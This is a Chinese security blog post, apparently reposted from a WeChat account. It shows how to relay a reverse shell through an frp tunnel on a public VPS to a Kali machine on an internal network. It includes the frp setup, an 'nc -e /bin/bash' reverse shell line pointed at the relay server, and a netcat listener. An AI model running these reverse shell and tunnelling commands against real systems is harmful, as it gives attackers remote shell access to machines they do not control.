利用frp内网穿透实现反弹shell

admin 2023年10月20日11:55:19评论62 views字数 1068阅读3分33秒阅读模式

前言:

很多时候kali都是处于我们内网的情况下,同时我们也知道,如果我们要进行反弹shell的话是一定要知道公网ip的,那么如何使得受害主机能正常反弹shell,同时我们的kali可以接受到信息呢?

正文:

frp是一款非常流行的内网穿透工具,我们这里就要利用frp来进行内网穿透。首先我们确定一下我们需要做什么,我们需要一台公网ip的服务器来当作我们的frp服务器,kali 我们的攻击机 处于内网环境中。

https://github.com/fatedier/frp

首先我们去frp的github链接分别下载到我们的公网vps上和我们的kali上

利用frp内网穿透实现反弹shell

首先来搭建我们的frp服务器,过程也非常简单:

首先将压缩包进行一个压缩

tar -zxvf frp_0.33.0_linux_amd64.tar.gz

解压之后的文件夹内容如下

利用frp内网穿透实现反弹shell

可以看到里面有两个一个是frpc 一个是frps

frpc 就代表着 frp client

frps 就代表着 frp server

我们先搭建我们的服务器,所以也就是frps

利用frp内网穿透实现反弹shell

我们不需要进行修改,这里代表的就是我们运行frp这个服务的端口是7000

然后我们运行我们的frp服务

利用frp内网穿透实现反弹shell

接下来配置我们的frp客户端

利用frp内网穿透实现反弹shell

第一个是红框是我们之前搭建的frp服务器的 ip

第二个红框就是我们kali的ip

local_port 就是我们kali后面监听的端口

remote_port = 4444 就是我们frp服务器上的端口

运行本地客户端

利用frp内网穿透实现反弹shell

反弹shell测试

在kali中利用msf工具时为了反弹shell常常需要设定本地监听端口,而虚拟机中的kali由于没有公网地址因此较难对公网中的服务器展开测试,通过frp代理很好的解决了这个问题在上面的配置中,我配置了一个基于tcp的4444端口,映射到虚拟机kali的4444端口作为反弹shell的监听端口,这样就能够利用虚拟机kali对公网服务器进行测试,具体展开测试如下:首先在kali上开启监听,接下来用另一台能联网的服务器反弹shell

我们在反弹shell的过程中地址是 公网ip

利用frp内网穿透实现反弹shell

nc -e /bin/bash 【frp服务器地址】 【frp映射TCP端口】

我们的frp服务器的4444 接受到我们的请求之后 会根据配置文件转发到我们kali的4444端口上,这样反弹shell就可以成功了

然后kali上监听 nc -lvnp 4444

利用frp内网穿透实现反弹shell

成功执行命令

然后我们的frp服务器上也显示了对应的日志

利用frp内网穿透实现反弹shell

工具下载:

关注公众号网络安全学习爱好者后台回复关键:frp获取百度网盘下载链接

原文始发于微信公众号(网络安全学习爱好者):利用frp内网穿透实现反弹shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月20日11:55:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用frp内网穿透实现反弹shellhttp://cn-sec.com/archives/2130196.html

发表评论

匿名网友 填写信息